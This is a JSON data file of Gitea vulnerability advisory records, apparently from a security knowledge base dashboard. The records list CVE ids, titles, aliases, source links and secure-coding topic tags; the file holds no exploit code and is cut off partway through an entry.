websafe-kb/08-threat-intel/generated/dashboard/advisories.json


{
"gitea--CVE-2021-29134": {
"canonical_id": "gitea--CVE-2021-29134",
"title": "Path Traversal in Gitea in code.gitea.io/gitea",
"summary": "Path Traversal in Gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T14:30:29Z",
"updated_at": "2026-03-03T04:50:06.638863Z",
"official_source_url": "https://github.com/advisories/GHSA-h3q4-vmw4-cpr5",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-29134",
"https://github.com/go-gitea/gitea/pull/15125/files",
"https://github.com/go-gitea/gitea/releases",
"https://github.com/go-gitea/gitea/releases/tag/v1.13.6"
],
"aliases": [
"BIT-gitea-2021-29134",
"CVE-2021-29134",
"GHSA-h3q4-vmw4-cpr5",
"GO-2022-0353"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"path-traversal-guard"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2021-3382": {
"canonical_id": "gitea--CVE-2021-3382",
"title": "Buffer Overflow in gitea in code.gitea.io/gitea",
"summary": "Buffer Overflow in gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-06-04T15:19:21Z",
"updated_at": "2026-03-03T04:55:15.307648Z",
"official_source_url": "https://github.com/advisories/GHSA-9f8c-pfvv-p4gm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-3382",
"https://github.com/go-gitea/gitea/pull/14390"
],
"aliases": [
"BIT-gitea-2021-3382",
"CVE-2021-3382",
"GHSA-9f8c-pfvv-p4gm",
"GO-2024-2757"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2021-45327": {
"canonical_id": "gitea--CVE-2021-45327",
"title": "Capture-replay in Gitea in code.gitea.io/gitea",
"summary": "Capture-replay in Gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T14:30:26Z",
"updated_at": "2026-03-03T04:52:07.840324Z",
"official_source_url": "https://github.com/advisories/GHSA-jrpg-35hw-m4p9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-45327",
"https://blog.gitea.io/2020/03/gitea-1.11.2-is-released",
"https://github.com/go-gitea/gitea/commit/4cb18601ff33dda5edb47d5b452cc8f2dc39dd67",
"https://github.com/go-gitea/gitea/commit/6f5656ab0ebec03fe63898208dabc802c4be46ab",
"https://github.com/go-gitea/gitea/commit/ed664a9e1dae4d4660e60c981173bbc5102e69ea",
"https://github.com/go-gitea/gitea/pull/10462",
"https://github.com/go-gitea/gitea/pull/10465",
"https://github.com/go-gitea/gitea/pull/10582"
],
"aliases": [
"BIT-gitea-2021-45327",
"CVE-2021-45327",
"GHSA-jrpg-35hw-m4p9",
"GO-2022-0310"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2021-45330": {
"canonical_id": "gitea--CVE-2021-45330",
"title": "Improper Privilege Management in Gitea in code.gitea.io/gitea",
"summary": "Improper Privilege Management in Gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T16:03:21Z",
"updated_at": "2026-03-03T04:52:33.136607Z",
"official_source_url": "https://github.com/advisories/GHSA-pg38-r834-g45j",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-45330",
"https://github.com/go-gitea/gitea/issues/4336",
"https://github.com/go-gitea/gitea/pull/4840"
],
"aliases": [
"BIT-gitea-2021-45330",
"CVE-2021-45330",
"GHSA-pg38-r834-g45j",
"GO-2022-0982"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2021-45331": {
"canonical_id": "gitea--CVE-2021-45331",
"title": "Reuse of one time passwords allowed in Gitea in code.gitea.io/gitea",
"summary": "Reuse of one time passwords allowed in Gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T14:30:29Z",
"updated_at": "2026-03-03T04:52:07.604662Z",
"official_source_url": "https://github.com/advisories/GHSA-hfmf-q69j-6m5p",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-45331",
"https://blog.gitea.io/2018/08/gitea-1.5.0-is-released",
"https://github.com/go-gitea/gitea/pull/3878"
],
"aliases": [
"BIT-gitea-2021-45331",
"CVE-2021-45331",
"GHSA-hfmf-q69j-6m5p",
"GO-2022-0315"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-0905": {
"canonical_id": "gitea--CVE-2022-0905",
"title": "Gitea Missing Authorization vulnerability in code.gitea.io/gitea",
"summary": "Gitea Missing Authorization vulnerability in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T15:11:40Z",
"updated_at": "2026-03-03T04:50:45.472605Z",
"official_source_url": "https://github.com/advisories/GHSA-jr9c-h74f-2v28",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-0905",
"https://github.com/go-gitea/gitea/commit/1314f38b59748397b3429fb9bc9f9d6bac85d2f2",
"https://github.com/go-gitea/gitea/commit/3e5c844a7758fa29126d201f4f98bf21bca6d314",
"https://huntr.dev/bounties/8d221f92-b2b1-4878-bc31-66ff272e5ceb"
],
"aliases": [
"BIT-gitea-2022-0905",
"CVE-2022-0905",
"GHSA-jr9c-h74f-2v28",
"GO-2022-0609"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-1058": {
"canonical_id": "gitea--CVE-2022-1058",
"title": "Gitea Open Redirect in code.gitea.io/gitea",
"summary": "Gitea Open Redirect in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-06-04T15:19:21Z",
"updated_at": "2026-03-03T04:51:49.844240Z",
"official_source_url": "https://github.com/advisories/GHSA-4rqq-rxvc-v2rc",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-1058",
"https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48",
"https://github.com/go-gitea/gitea/pull/19175",
"https://github.com/go-gitea/gitea/pull/19186",
"https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d"
],
"aliases": [
"BIT-gitea-2022-1058",
"CVE-2022-1058",
"GHSA-4rqq-rxvc-v2rc",
"GO-2024-2752"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-1928": {
"canonical_id": "gitea--CVE-2022-1928",
"title": "Stored Cross-site Scripting in gitea in code.gitea.io/gitea",
"summary": "Stored Cross-site Scripting in gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T15:11:40Z",
"updated_at": "2026-03-03T04:50:45.577318Z",
"official_source_url": "https://github.com/advisories/GHSA-ph3w-2843-72mx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-1928",
"https://github.com/go-gitea/gitea",
"https://github.com/go-gitea/gitea/commit/65e0688a5c9dacad50e71024b7529fdf0e3c2e9c",
"https://github.com/go-gitea/gitea/pull/19825",
"https://huntr.dev/bounties/6336ec42-5c4d-4f61-ae38-2bb539f433d2",
"https://security.gentoo.org/glsa/202210-14"
],
"aliases": [
"BIT-gitea-2022-1928",
"CVE-2022-1928",
"GHSA-ph3w-2843-72mx",
"GO-2022-0612"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-27313": {
"canonical_id": "gitea--CVE-2022-27313",
"title": "Arbitrary file deletion in gitea in code.gitea.io/gitea",
"summary": "Arbitrary file deletion in gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T15:11:31Z",
"updated_at": "2026-03-03T04:50:19.647131Z",
"official_source_url": "https://github.com/advisories/GHSA-g7p7-x6w7-w6qg",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-27313",
"https://github.com/go-gitea/gitea/pull/19072",
"https://github.com/go-gitea/gitea/releases/tag/v1.16.4"
],
"aliases": [
"BIT-gitea-2022-27313",
"CVE-2022-27313",
"GHSA-g7p7-x6w7-w6qg",
"GO-2022-0442"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-30781": {
"canonical_id": "gitea--CVE-2022-30781",
"title": "Shell command injection in gitea in code.gitea.io/gitea",
"summary": "Shell command injection in gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T15:11:31Z",
"updated_at": "2026-03-03T04:50:23.949796Z",
"official_source_url": "https://github.com/advisories/GHSA-p5f9-c9j9-g8qx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-30781",
"http://packetstormsecurity.com/files/168400/Gitea-1.16.6-Remote-Code-Execution.html",
"http://packetstormsecurity.com/files/169928/Gitea-Git-Fetch-Remote-Code-Execution.html",
"https://blog.gitea.io/2022/05/gitea-1.16.7-is-released",
"https://github.com/go-gitea/gitea/pull/19487",
"https://github.com/go-gitea/gitea/pull/19490"
],
"aliases": [
"BIT-gitea-2022-30781",
"CVE-2022-30781",
"GHSA-p5f9-c9j9-g8qx",
"GO-2022-0450"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-38183": {
"canonical_id": "gitea--CVE-2022-38183",
"title": "Gitea allowed assignment of private issues in code.gitea.io/gitea",
"summary": "Gitea allowed assignment of private issues in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-06-10T16:38:54Z",
"updated_at": "2026-03-03T04:55:04.505871Z",
"official_source_url": "https://github.com/advisories/GHSA-fhv8-m4j4-cww2",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-38183",
"https://blog.gitea.io/2022/07/gitea-1.16.9-is-released",
"https://github.com/go-gitea/gitea/pull/20133",
"https://github.com/go-gitea/gitea/pull/20196",
"https://herolab.usd.de/security-advisories/usd-2022-0015"
],
"aliases": [
"BIT-gitea-2022-38183",
"CVE-2022-38183",
"GHSA-fhv8-m4j4-cww2",
"GO-2024-2769"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-38795": {
"canonical_id": "gitea--CVE-2022-38795",
"title": "Gitea erroneous repo clones in code.gitea.io/gitea",
"summary": "Gitea erroneous repo clones in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T14:17:52Z",
"updated_at": "2026-03-03T04:54:07.076900Z",
"official_source_url": "https://github.com/advisories/GHSA-8j3v-68w3-3848",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-38795",
"https://blog.gitea.com/release-of-1.17.2",
"https://github.com/go-gitea/gitea/pull/20869",
"https://github.com/go-gitea/gitea/pull/20892"
],
"aliases": [
"BIT-gitea-2022-38795",
"CVE-2022-38795",
"GHSA-8j3v-68w3-3848",
"GO-2023-1999"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-42968": {
"canonical_id": "gitea--CVE-2022-42968",
"title": "Gitea vulnerable to Argument Injection in code.gitea.io/gitea",
"summary": "Gitea vulnerable to Argument Injection in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T16:03:24Z",
"updated_at": "2026-03-03T04:52:41.181693Z",
"official_source_url": "https://github.com/advisories/GHSA-w8xw-7crf-h23x",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-42968",
"https://github.com/go-gitea/gitea/pull/21463",
"https://github.com/go-gitea/gitea/releases/tag/v1.17.3",
"https://security.gentoo.org/glsa/202210-14"
],
"aliases": [
"BIT-gitea-2022-42968",
"CVE-2022-42968",
"GHSA-w8xw-7crf-h23x",
"GO-2022-1065"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68938": {
"canonical_id": "gitea--CVE-2025-68938",
"title": "Gitea mishandles authorization for deletion of releases in code.gitea.io/gitea",
"summary": "Gitea mishandles authorization for deletion of releases in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:49.095775Z",
"official_source_url": "https://github.com/advisories/GHSA-cm54-pfmc-xrwx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68938",
"https://blog.gitea.com/release-of-1.25.2",
"https://github.com/go-gitea/gitea/pull/36002/commits/d4262131b39899d9e9ee5caa2635c810d476e43f#diff-8962bac89952027d50fa51f31f59d65bedb4c02bde0265eced5cf256cbed306d",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.2"
],
"aliases": [
"BIT-gitea-2025-68938",
"CVE-2025-68938",
"GHSA-cm54-pfmc-xrwx",
"GO-2025-4258"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68941": {
"canonical_id": "gitea--CVE-2025-68941",
"title": "Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea",
"summary": "Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:50.339953Z",
"official_source_url": "https://github.com/advisories/GHSA-xfq3-qj7j-4565",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68941",
"https://blog.gitea.com/release-of-1.22.3",
"https://github.com/go-gitea/gitea/pull/32218",
"https://github.com/go-gitea/gitea/releases/tag/v1.22.3"
],
"aliases": [
"BIT-gitea-2025-68941",
"CVE-2025-68941",
"GHSA-xfq3-qj7j-4565",
"GO-2025-4268"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68942": {
"canonical_id": "gitea--CVE-2025-68942",
"title": "Gitea allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text in code.gitea.io/gitea",
"summary": "Gitea allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:49.781753Z",
"official_source_url": "https://github.com/advisories/GHSA-898p-hh3p-hf9r",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68942",
"https://blog.gitea.com/release-of-1.22.2",
"https://github.com/go-gitea/gitea/pull/31966",
"https://github.com/go-gitea/gitea/releases/tag/v1.22.2"
],
"aliases": [
"BIT-gitea-2025-68942",
"CVE-2025-68942",
"GHSA-898p-hh3p-hf9r",
"GO-2025-4263"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68943": {
"canonical_id": "gitea--CVE-2025-68943",
"title": "Gitea inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order in code.gitea.io/gitea",
"summary": "Gitea inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:49.213758Z",
"official_source_url": "https://github.com/advisories/GHSA-jhx5-4vr4-f327",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68943",
"https://blog.gitea.com/release-of-1.21.8-and-1.21.9-and-1.21.10",
"https://github.com/go-gitea/gitea/pull/29430",
"https://github.com/go-gitea/gitea/releases/tag/v1.21.8"
],
"aliases": [
"BIT-gitea-2025-68943",
"CVE-2025-68943",
"GHSA-jhx5-4vr4-f327",
"GO-2025-4266"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68944": {
"canonical_id": "gitea--CVE-2025-68944",
"title": "Gitea sometimes mishandles propagation of token scope for access control within one of its own package registries in code.gitea.io/gitea",
"summary": "Gitea sometimes mishandles propagation of token scope for access control within one of its own package registries in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:50.526913Z",
"official_source_url": "https://github.com/advisories/GHSA-f85h-c7m6-cfpm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68944",
"https://blog.gitea.com/release-of-1.22.2",
"https://github.com/go-gitea/gitea/pull/31967",
"https://github.com/go-gitea/gitea/releases/tag/v1.22.2"
],
"aliases": [
"BIT-gitea-2025-68944",
"CVE-2025-68944",
"GHSA-f85h-c7m6-cfpm",
"GO-2025-4264"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68945": {
"canonical_id": "gitea--CVE-2025-68945",
"title": "Gitea: anonymous user can visit private user's project in code.gitea.io/gitea",
"summary": "Gitea: anonymous user can visit private user's project in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:51.457970Z",
"official_source_url": "https://github.com/advisories/GHSA-7xq4-mwcp-q8fx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68945",
"https://blog.gitea.com/release-of-1.21.2",
"https://github.com/go-gitea/gitea/pull/28423",
"https://github.com/go-gitea/gitea/releases/tag/v1.21.2"
],
"aliases": [
"BIT-gitea-2025-68945",
"CVE-2025-68945",
"GHSA-7xq4-mwcp-q8fx",
"GO-2025-4262"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68946": {
"canonical_id": "gitea--CVE-2025-68946",
"title": "Gitea vulnerable to Cross-site Scripting in code.gitea.io/gitea",
"summary": "Gitea vulnerable to Cross-site Scripting in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:50.473303Z",
"official_source_url": "https://github.com/advisories/GHSA-hq57-c72x-4774",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68946",
"https://blog.gitea.com/release-of-1.20.1",
"https://github.com/go-gitea/gitea/pull/25960",
"https://github.com/go-gitea/gitea/releases/tag/v1.20.1"
],
"aliases": [
"BIT-gitea-2025-68946",
"CVE-2025-68946",
"GHSA-hq57-c72x-4774",
"GO-2025-4265"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-69413": {
"canonical_id": "gitea--CVE-2025-69413",
"title": "Gitea's /api/v1/user endpoint has different responses for failed authentication depending on whether a username exists in code.gitea.io/gitea",
"summary": "Gitea's /api/v1/user endpoint has different responses for failed authentication depending on whether a username exists in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-01-12T17:39:39Z",
"updated_at": "2026-03-03T04:57:49.801641Z",
"official_source_url": "https://github.com/advisories/GHSA-pc73-rj2c-wvf9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-69413",
"https://blog.gitea.com/release-of-1.25.2",
"https://github.com/go-gitea/gitea/issues/35984",
"https://github.com/go-gitea/gitea/pull/36002",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.2"
],
"aliases": [
"BIT-gitea-2025-69413",
"CVE-2025-69413",
"GHSA-pc73-rj2c-wvf9",
"GO-2026-4274"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-0798": {
"canonical_id": "gitea--CVE-2026-0798",
"title": "Gitea may send release notification emails for private repositories to users whose access has been revoked in code.gitea.io/gitea",
"summary": "Gitea may send release notification emails for private repositories to users whose access has been revoked in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:54.518308Z",
"official_source_url": "https://github.com/advisories/GHSA-8fwc-qjw5-rvgp",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-0798",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/pull/36319",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-0798",
"CVE-2026-0798",
"GHSA-8fwc-qjw5-rvgp",
"GHSA-f4wq-6ww5-m56p",
"GO-2026-4365"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20736": {
"canonical_id": "gitea--CVE-2026-20736",
"title": "Gitea has improper access control for uploaded attachments in code.gitea.io/gitea",
"summary": "Gitea has improper access control for uploaded attachments in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:53.977351Z",
"official_source_url": "https://github.com/advisories/GHSA-hgr3-x44x-33hx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20736",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/fbea2c68e8df11cfa94e8ead913b79946780ed30",
"https://github.com/go-gitea/gitea/pull/36320",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20736",
"CVE-2026-20736",
"GHSA-hgr3-x44x-33hx",
"GHSA-jr6h-pwwp-c8g6",
"GO-2026-4367"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"file-upload-validation"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20750": {
"canonical_id": "gitea--CVE-2026-20750",
"title": "Gitea does not properly validate project ownership in organization project operations in code.gitea.io/gitea",
"summary": "Gitea does not properly validate project ownership in organization project operations in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:57.697708Z",
"official_source_url": "https://github.com/advisories/GHSA-rw22-5hhq-pfpf",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20750",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/7b5de594cd92e30b9c3d40ffda119acad794cc64",
"https://github.com/go-gitea/gitea/pull/36318",
"https://github.com/go-gitea/gitea/pull/36373",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20750",
"CVE-2026-20750",
"GHSA-h4fh-pc4w-8w27",
"GHSA-rw22-5hhq-pfpf",
"GO-2026-4370"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
